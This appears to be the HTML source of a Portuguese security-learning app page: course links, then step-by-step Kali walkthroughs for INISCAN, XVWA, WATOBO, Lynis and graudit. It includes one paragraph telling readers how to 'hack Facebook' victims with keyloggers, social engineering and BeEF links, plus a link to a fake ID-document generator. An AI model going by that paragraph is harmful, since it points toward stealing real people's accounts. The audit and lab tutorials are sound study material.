<a class="list-group-item allow-badge widget uib_w_495" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/programacao/css3/introducao-ao-html5/">
<h4 class="list-group-item-heading">90- Introdução ao HTML5 com JavaScript e CSS3 </h4>
</a>
<a class="list-group-item allow-badge widget uib_w_496" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/recriando-o-flappybird-aprenda-desenvolver-o-jogo-em-android/">
<h4 class="list-group-item-heading">91- Recriando o FlappyBird – Aprenda desenvolver o jogo em Android</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_497" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/python/">
<h4 class="list-group-item-heading">92- Curso de Python</h4>
</a>
</div>
<div class="list-group widget uib_w_501 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_502" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/curso-visual-basic-iniciantes/">
<h4 class="list-group-item-heading">93- Curso de Visual Basic para iniciantes</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_503" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.cursou.com.br/informatica/programacao/curso-de-css3/">
<h4 class="list-group-item-heading">94- Curso de CSS3</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_504" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.learncafe.com/cursos/criando-landing-pages-aprenda-a-estruturar-uma-pagina-que-converta">
<h4 class="list-group-item-heading">95- Criando landing pages - Aprenda a estruturar uma página que converta</h4>
</a>
</div>
<div class="list-group widget uib_w_505 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_506" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.learncafe.com/cursos/consultar-inserir-editar-e-excluir-utilizando-a-classe-pdo">
<h4 class="list-group-item-heading">96- PHP: Consultar, Inserir, Editar e Excluir utilizando a classe PDO</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_507" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="Introdução ao desenvolvimento para Windows 8 – Curso da Microsoft Fonte: http://www.cursou.com.br/informatica/introducao-desenvolvimento-windows-8/#ixzz3wQMxNMvb">
<h4 class="list-group-item-heading">97- Introdução ao desenvolvimento para Windows 8 – Curso da Microsoft</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_508" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.profissionaisti.com.br/2015/08/54-cursos-online-e-gratuitos-em-ti-qualifique-se/">
<h4 class="list-group-item-heading">98- 54 CURSOS ONLINE E GRATUITOS EM TI – (Tecnologia da Informação)</h4>
</a>
</div>
<div class="btn-group uib-bs-flex widget uib_w_513 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_514 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1">Outros</button>
</div>
<div class="list-group widget uib_w_509 d-margins" data-uib="twitter%20bootstrap/list_group" data-ver="1">
<a class="list-group-item allow-badge widget uib_w_510" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.md5online.org/">
<h4 class="list-group-item-heading">99- descriptografar HASH</h4>
</a>
<a class="list-group-item allow-badge widget uib_w_511" data-uib="twitter%20bootstrap/list_item" data-ver="1" href="http://www.4devs.com.br/">
<h4 class="list-group-item-heading">100- GERADOR</h4>
<p class="list-group-item-text">GERADOR DE DOCUMENTOS DE PESSOAS (NOME, RG, CPF, CEP, ENDEREÇO, ETC)</p>
</a>
</div>
<div class="embed-video widget uib_w_19 d-margins" data-uib="media/youtube" data-ver="0">
<iframe src="http://www.youtube.com/embed/bTCxAi_W86c?wmode=transparent">
</iframe>
</div>
<span class="uib_shim"></span>
</div>
</div>
<div role="tabpanel" id="third-tab" class="col uib_col_3 tab-pane" data-uib="layout/col" data-ver="0">
<div class="widget-container content-area vertical-col">
<span class="uib_shim"></span>
</div>
</div>
</div>
</div>
<div class="uib-footer uib-footer-fixed footer-bg container-group inner-element uib_w_23" data-uib="layout/footer" data-ver="0">
<h2></h2>
<div class="widget-container wrapping-col single-centered">
<div class="btn-group uib-bs-flex widget uib_w_24 d-margins" data-uib="twitter%20bootstrap/button_group" data-ver="1">
<button class="btn widget uib_w_25 btn-lg btn-info" data-uib="twitter%20bootstrap/button" data-ver="1"><i class="glyphicon glyphicon-envelope button-icon-left" data-position="left"></i>CONTATO</button>
</div>
</div>
<div class="widget-container content-area horiz-area wrapping-col left"></div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
</div>
</div>
<div class="upage hidden back" id="ComoHackFBDICAS">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_26" data-uib="layout/header" data-ver="0">
<h2>FACEBOOK</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_29 d-margins btn-primary" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_voltarface"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_4_12">
<div class="widget uib_w_27" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://thenextweb.com/wp-content/blogs.dir/1/files/2015/06/Facebook_featured.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_28 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_28">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>As dicas que eu passo para voce que quer começar a hackear facebook vou te passar 3 dicas e tres formas as 3 formas para vc poder utilizar é hackeando atraves de keylogger na aba inicial e na aba de video tem ensinando a criar
um keylogger keylogger nada mas é que hackear o computador da vitima e assim esta recebendo os registros do computador dela no seu email outra forma é por engenharia social (arte de enganar) e outra dica é por ataque chamado
BeEf nada mas é que gerar um link e com isso enviar o link para vitima e quando ela clicar obtemos informações dela </p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="INISCAN_PPG">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_73" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_78 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_inis"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_78_58">
<div class="tarea widget uib_w_79 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_79">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>A ferramenta <strong>INISCAN</strong> foi desenhada para avaliar se o arquivo PHP.INI esta configurado baseado nas boas práticas de segurança o que pode evitar a exploração de códigos maliciosos ou ate o acesso total
ao servidor devido a alguma vulnerabilidade.</p>
<p><strong>01 Passo</strong>
</p>
<p>Realize o download do <strong>Composer</strong>
</p>
<p>root@kali:/# curl -sS https://getcomposer.org/installer | php</p>
</div>
</div>
<div class="widget uib_w_80" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_81 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_81">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Mova/Renomeie o arquivo composer.phar para o diretório /usr/local/bin</p>
<p>root@kali:/# mv composer.phar /usr/local/bin/composer</p>
</div>
</div>
<div class="widget uib_w_82" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec02.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_83 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_83">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>03 Passo</strong>
</p>
<p>Através do repositório do composer realize o download da ferramenta iniscan</p>
<p>root@kali:/# composer global require psecio/iniscan</p>
</div>
</div>
<div class="widget uib_w_84" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_85 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_85">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>Entre no diretório /usr/local/bin e crie um link simbólico da ferramenta iniscan</p>
<p>root@kali:/# cd /usr/local/bin/</p>
<p>root@kali:/usr/local/bin# ln -s /root/.composer/vendor/psecio/iniscan/bin/iniscan</p>
<p>root@kali:/usr/local/bin# cd /</p>
<p>root@kali:/#</p>
</div>
</div>
<div class="widget uib_w_86" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec04.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_87 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_87">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>05 Passo</strong>
</p>
<p>Execute o iniscan sobre o arquivo /etc/php5/apache2/php.ini</p>
<p>root@kali:/# iniscan scan –path=/etc/php5/apache2/php.ini | more</p>
</div>
</div>
<div class="widget uib_w_88" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec05.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_89 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_89">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>06 Passo</strong>
</p>
<p>Uma forma mais amigável de visualizar os Erros e Alertas e gerar um relatório no formato HTML para isso crie o diretório /var/www/relatorio</p>
<p>root@kali:/# mkdir -p /var/www/relatorio</p>
</div>
</div>
<div class="widget uib_w_90" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec06.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_91 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_91">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>07 Passo</strong>
</p>
<p>Execute o comando</p>
<p>root@kali:/# initscan scan –path=/etc/php5/apache2/php.ini –format=html –output=/var/www/relatorio</p>
</div>
</div>
<div class="widget uib_w_92" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec07.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_93 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_93">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>08 Passo</strong>
</p>
<p>Relatório gerado em HTML.</p>
</div>
</div>
<div class="widget uib_w_94" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/08/phpsec08.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="xtremevulPG">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_37" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_38 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_voltar_xtrme"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_79_82">
<div class="tarea widget uib_w_39 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_39">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>XVWA – Xtreme Vulnerable Web Application </strong> é uma ferramenta desenvolvida em PHP/MySQL que contém diversos tipos de vulnerabilidades web, é uma ótima solução para praticar seus conhecimentos em Segurança
de Aplicações Web.</p>
<p><strong>Projeto:</strong> github.com/s4n7h0/xvwa</p>
<p><strong>01 Passo</strong>
</p>
<p>Considerando que você já tenha um servidor com Apache + PHP e MySQL rodando realize o download do XVWA.</p>
<p>root@kali:/# cd /var/www</p>
<p>root@kali:/var/www# git clone https://github.com/s4n7h0/xvwa</p>
</div>
</div>
<div class="widget uib_w_40" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/10/xvwa01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_41 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_41">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Entre no diretório <strong>xvwa</strong> e liste</p>
<p>root@kali:/var/www# cd xvwa</p>
<p>root@kali:/var/www/xvwa# ls</p>
</div>
</div>
<div class="widget uib_w_42" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/10/xvwa02.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_43 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_43">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>03 Passo</strong>
</p>
<p>Configure os dados do banco de dados no arquivo <strong>config.php</strong>
</p>
<p>root@kali:/var/www/xvwa# vim config.php</p>
</div>
</div>
<div class="widget uib_w_44" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/10/xvwa03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="widget uib_w_45" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/10/xvwa04.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_46 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_46">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>Acesse o servidor via web <strong>http://<IP-DO-SERVIDOR/xvwa/setup</strong> e clique em<strong> Submit / Reset</strong>
</p>
</div>
</div>
<div class="widget uib_w_47" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/10/xvwa05.jpg">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_48 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_48">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>aso tenha problema na conexão ou criação do banco de dados (clique aqui) para fazer o download do banco de dados completo.</p>
<p><strong>05 Passo</strong>
</p>
<p>Você pode logar no sistema utilizando os usuários e senhas abaixo:</p>
<p>Usuário: admin | Senha: admin
<br>Usuário: xvwa | Senha: xvwa
<br>Usuário: user | Senha: vulnerable</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="WATOBO_PG">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_117" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_118 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="BTN_WOOD"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_52_38">
<div class="tarea widget uib_w_119 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_119">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <strong>WATOBO</strong> – The WebApplication ToolBox é uma ferramenta de PenTest desenvolvida em Ruby com foco no PenTest de aplicações Web, vale a pena explorar-lá.</p>
<p>Disponível para <strong>Windows</strong> e <strong>Linux</strong>.</p>
<p><strong>Projeto:</strong> watobo.sourceforge.net</p>
<p><strong>Desenvolvedor: </strong>www.siberas.de</p>
<p><strong>Instalação no Windows</strong>
</p>
<p><strong>Pré-requisitos:</strong>
</p>
<p>Ruby 2.2.2 –</p>
<p>Development Kit (x64) –
<br>
<br>
</p>
<p><strong>01 Passo</strong>
</p>
<p>Realize a instalação do <strong>WATOBO</strong>
</p>
<p>root@kali:/# apt-get install watobo</p>
</div>
</div>
<div class="widget uib_w_120" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/watobo01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_121 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_121">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Execute o <strong>WATOBO</strong>
</p>
<p>root@kali:/# watobo</p>
</div>
</div>
<div class="widget uib_w_124" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/watobo03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_123 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_123">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>Clique em <strong>Plugin-Board</strong> para explorar os recursos</p>
</div>
</div>
<div class="widget uib_w_125" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/watobo04.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Lynis_PG">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_95" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_96 d-margins btn-primary" data-uib="twitter%20bootstrap/button" data-ver="1" id="BTN_LYNS"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_53_24">
<div class="tarea widget uib_w_97 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_97">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>Lynis </strong>é uma excelente ferramenta de Auditoria e Hardening para Linux, Unix e etc… possui um relatório bem detalhado e certamente vai auxiliar no processo de implantação de boas prática em um servidor.</p>
<p><strong>Projeto:</strong> github.com/CISOfy/lynis</p>
<p><strong>Site Oficial: </strong>cisofy.com</p>
<p><strong>01 Passo</strong>
</p>
<p>Realize o download do <strong>lynis</strong>
</p>
<p>root@kali:/# git clone https://github.com/CISOfy/lynis</p>
</div>
</div>
<div class="widget uib_w_102" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_103 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_103">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Entre no diretório do <strong>lynis </strong>e liste os arquivos.</p>
<p>root@kali:/# cd lynis/</p>
<p>root@kali:/lynis# ls</p>
</div>
</div>
<div class="widget uib_w_104" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis02.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_105 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_105">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>03 Passo</strong>
</p>
<p>Execute o lynis para visualizar todos os parâmetros que ele disponibiliza.</p>
<p>root@kali:/lynis# ./lynis</p>
</div>
</div>
<div class="widget uib_w_106" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_107 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_107">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>Execute o lynis para auditar todo o sistema.</p>
<p>root@kali:/lynis# ./lynis audit system –auditor “100SECURITY” –Q</p>
<p>audit system : Audita todo o sistema</p>
<p>–auditor “100SECURITY” : Define o nome do Auditor</p>
<p>-Q (–quick) : Não aguarda a interação do Auditor</p>
</div>
</div>
<div class="widget uib_w_108" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis05.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_109 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_109">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>05 Passo</strong>
</p>
<p>São gerados 02 arquivos de log, acesse o diretório /var/www e realize o download da ferramenta lynis-relatorios para ler o relatório gerado.</p>
<p>– <strong>Teste e detalhamento:</strong> /var/log/lynis.log
<br>–
<strong>Relatório:</strong> /var/log/lynis-repot.dat</p>
<p>root@kali:/lynis# cd /var/www/</p>
<p>root@kali:/var/www# git clone https://github.com/100security/lynis-relatorios</p>
</div>
</div>
<div class="widget uib_w_110" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis07.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_111 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_111">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>06 Passo</strong>
</p>
<p>Entre no diretório e liste os arquivos.</p>
<p>root@kali:/var/www# cd lynis-relatorios/</p>
<p>root@kali:/var/www/lynis-relatorios#</p>
</div>
</div>
<div class="widget uib_w_112" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis08.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_113 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_113">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>07 Passo</strong>
</p>
<p>Execute o script arquivos.sh para copiar os arquivos gerados pela ferramenta Lynis</p>
<p>root@kali:/var/www/lynis-relatorios# ./arquivos.sh</p>
<p>root@kali:/var/www/lynis-relatorios# ls -l</p>
</div>
</div>
<div class="widget uib_w_114" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis09.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_115 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_115">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>08 Passo</strong>
</p>
<p>Abra o navegador e acesse: http://localhost/lynis-relatorios/lynis-relatorios.php</p>;
</div>
</div>
<div class="widget uib_w_116" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/07/lynis10.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="uib_page_1">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_152" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_153 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_j"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_36_43">
<div class="tarea widget uib_w_154 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_154">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <strong>GRAUDIT</strong> é uma ferramenta de análise estática que destaca possíveis vulnerabilidades em um código fonte, sua estrutura foi desenvolvida para avaliar diversas linguagens dentre elas:
ASP, JSP, Perl, PHP, Python, etc..</p>
<p><strong>Projeto:</strong> github.com/wireghoul/graudit</p>
<p><strong>Observações:</strong>
<br>Para realizar o teste do graudit utilizamos o DVWA (Um sistema com diversas vulnerabilidades) caso queira implantá-lo para testar seus conhecimentos leia o artigo: DVWA – Damn Vulnerable Web Application</p>
<p><strong>01 Passo</strong>
</p>
<p>Realize o download do <strong>graudit</strong>
</p>
<p>root@kali:/# git clone https://github.com/wireghoul/graudit</p>
</div>
</div>
<div class="widget uib_w_155" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/05/graudit01.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_156 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_156">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>02 Passo</strong>
</p>
<p>Entre no diretório do <strong>graudit</strong> e liste os arquivos.</p>
<p>root@kali:/# cd graudit/</p>
<p>root@kali:/graudit# ls</p>
</div>
</div>
<div class="widget uib_w_157" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/05/graudit02.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_158 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_158">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>03 Passo</strong>
</p>
<p>Ao executar o <strong>graudit</strong> diversas opção são disponibilizadas para que você possa realizar a análise.</p>
<p>root@kali:/graudit# ./graudit</p>
</div>
</div>
<div class="widget uib_w_159" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/05/graudit03.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_160 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_160">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>04 Passo</strong>
</p>
<p>A opção <strong>-A</strong> contempla uma análise completa na alvo.</p>
<p>root@kali:/graudit# ./graudit –A /var/www/DVWA-1.0.8/</p>
</div>
</div>
<div class="widget uib_w_161" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/05/graudit04.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_162 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_162">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p><strong>05 Passo</strong>
</p>
<p>Enfim todas as possíveis vulnerabilidades encontradas são exibidas.</p>
</div>
</div>
<div class="widget uib_w_163" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://www.100security.com.br/wp-content/uploads/2015/05/graudit05.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="SAWEF_Crawler_">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_138" data-uib="layout/header" data-ver="0">
<h2>VULNERABILIDADES</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_139 d-margins btn-primary" data-uib="twitter%20bootstrap/button" data-ver="1" id="BACK_ARRY_"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_37_34">
